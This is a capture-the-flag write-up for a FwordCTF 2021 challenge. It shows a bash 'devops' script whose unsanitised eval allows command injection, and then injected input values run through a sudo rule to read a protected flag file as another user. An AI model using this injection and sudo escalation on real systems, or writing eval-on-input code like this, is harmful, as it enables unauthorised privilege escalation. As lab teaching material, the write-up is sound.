Rating: 5.0

Let's **ssh** into target machine with given password.
```sh
$ ssh -p 10000 [email protected]
...
user1@989e5134aee5:/home/user1$ whoami
user1
user1@989e5134aee5:/home/user1$ pwd
/home/user1
```
We are `user1` and we are in `/home/user1` directory.

There are two interesting files in it.
```sh
user1@8753298afbf4:/home/user1$ ls -lah
total 32K
drwxrwxr-t 1 root user1 4.0K Aug 27 22:44 .
drwxr-xr-x 1 root root 4.0K Aug 27 22:43 ..
-rw-r--r-- 1 user1 user1 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 user1 user1 3.7K Feb 25 2020 .bashrc
-rw-r--r-- 1 user1 user1 807 Feb 25 2020 .profile
-rwxr-xr-x 1 root user-privileged 945 Aug 27 22:09 devops.sh
-rwxr----- 1 root user-privileged 67 Aug 27 22:09 flag.txt
```
The flag must be in `flag.txt`.However, we can't read it because we are not **user-privileged**.

But we can read `devops.sh` which is a bash script.
```sh
user1@98f2e7ef5bdd:/home/user1$ cat devops.sh
#!/bin/bash
PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:"
exec 2>/dev/null
name="deploy"
while [[ "$1" =~ ^- && ! "$1" == "--" ]]; do case $1 in
-V | --version )
echo "Beta version"
exit
;;
-d | --deploy )
deploy=1
;;
-p | --permission )
permission=1
;;
esac; shift; done
if [[ "$1" == '--' ]]; then shift; fi

echo -ne "Welcome To Devops Swiss Knife \o/\n\nWe deploy everything for you:\n"

if [[ deploy -eq 1 ]];then
echo -ne "Please enter your true name if you are a shinobi\n"
read -r name
eval "function $name { terraform init &>/dev/null && terraform apply &>/dev/null ; echo \"It should be deployed now\"; }"
export -f $name
fi

isAdmin=0
# Ofc only admins can deploy stuffs o//
if [[ $isAdmin -eq 1 ]];then
$name
fi

# Check your current permissions admin-san
if [[ $permission -eq 1 ]];then
echo "You are: "
id
fi
```
There is a **eval** command which executes arguments as a shell command at line 25 in `devops.sh`.

Before executing that command, the script asks for `name` and passes the value to the argument of **eval**.

There is no filter for `name`.So, command **injection** is possible!

One thing is that, we have to set `-d` or `--deploy` when executing the script to get to that part of the script.
```sh
...
while [[ "$1" =~ ^- && ! "$1" == "--" ]]; do case $1 in
-V | --version )
echo "Beta version"
exit
;;
-d | --deploy ) #!!!
deploy=1 #!!!
;;
-p | --permission )
permission=1
;;
esac; shift; done
...
if [[ deploy -eq 1 ]];then #!!!
echo -ne "Please enter your true name if you are a shinobi\n"
read -r name
eval "function $name { terraform init &>/dev/null && terraform apply &>/dev/null ; echo \"It should be deployed now\"; }"
export -f $name
fi
...
```
Let's give `a { echo GOOD; }; a #` when the script ask for `name`.So, the argument of **eval** will look like this

`function a { echo GOOD; }; a #{ terraform init &>/dev/null && terraform apply &>/dev/null ; echo \"It should be deployed now\"; }`

```sh
user1@ef597d4726a8:/home/user1$ ./devops.sh -d
Welcome To Devops Swiss Knife \o/

We deploy everything for you:
Please enter your true name if you are a shinobi
a { echo GOOD; }; a #
GOOD
```
Yay it works!

Now, let's try to read the flag
```sh
user1@17587ec35262:/home/user1$ ./devops.sh -d
Welcome To Devops Swiss Knife \o/

We deploy everything for you:
Please enter your true name if you are a shinobi
a { cat flag.txt; }; a #
user1@17587ec35262:/home/user1$
```
Hmm... nothing happen?

That's because we are just `user1` when executing the script.
```sh
user1@17587ec35262:/home/user1$ ./devops.sh -d
Welcome To Devops Swiss Knife \o/

We deploy everything for you:
Please enter your true name if you are a shinobi
a { whoami; }; a #
user1
```
We have to find a way to become `user-privileged`.

Let's check what commands `user1` can do as **sudo**.
```sh
user1@17587ec35262:/home/user1$ sudo -l
Matching Defaults entries for user1 on 17587ec35262:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User user1 may run the following commands on 17587ec35262:
(user-privileged) NOPASSWD: /home/user1/devops.sh
```
It looks like we can run `devops.sh` as `user-privileged` without password.

Let's try it!
```sh
user1@6d6027070d37:/home/user1$ sudo -u user-privileged ./devops.sh -d
Welcome To Devops Swiss Knife \o/

We deploy everything for you:
Please enter your true name if you are a shinobi
a { cat flag.txt; }; a #
FwordCTF{W00w_KuR0ko_T0ld_M3_th4t_Th1s_1s_M1sdirecti0n_BasK3t_FTW}
```
And, there is the flag!

`FwordCTF{W00w_KuR0ko_T0ld_M3_th4t_Th1s_1s_M1sdirecti0n_BasK3t_FTW}`

Original writeup (https://github.com/MikelAcker/CTF_WRITEUPS_2021/tree/main/FwordCTF_2021_Writeup/Bash/devprivops).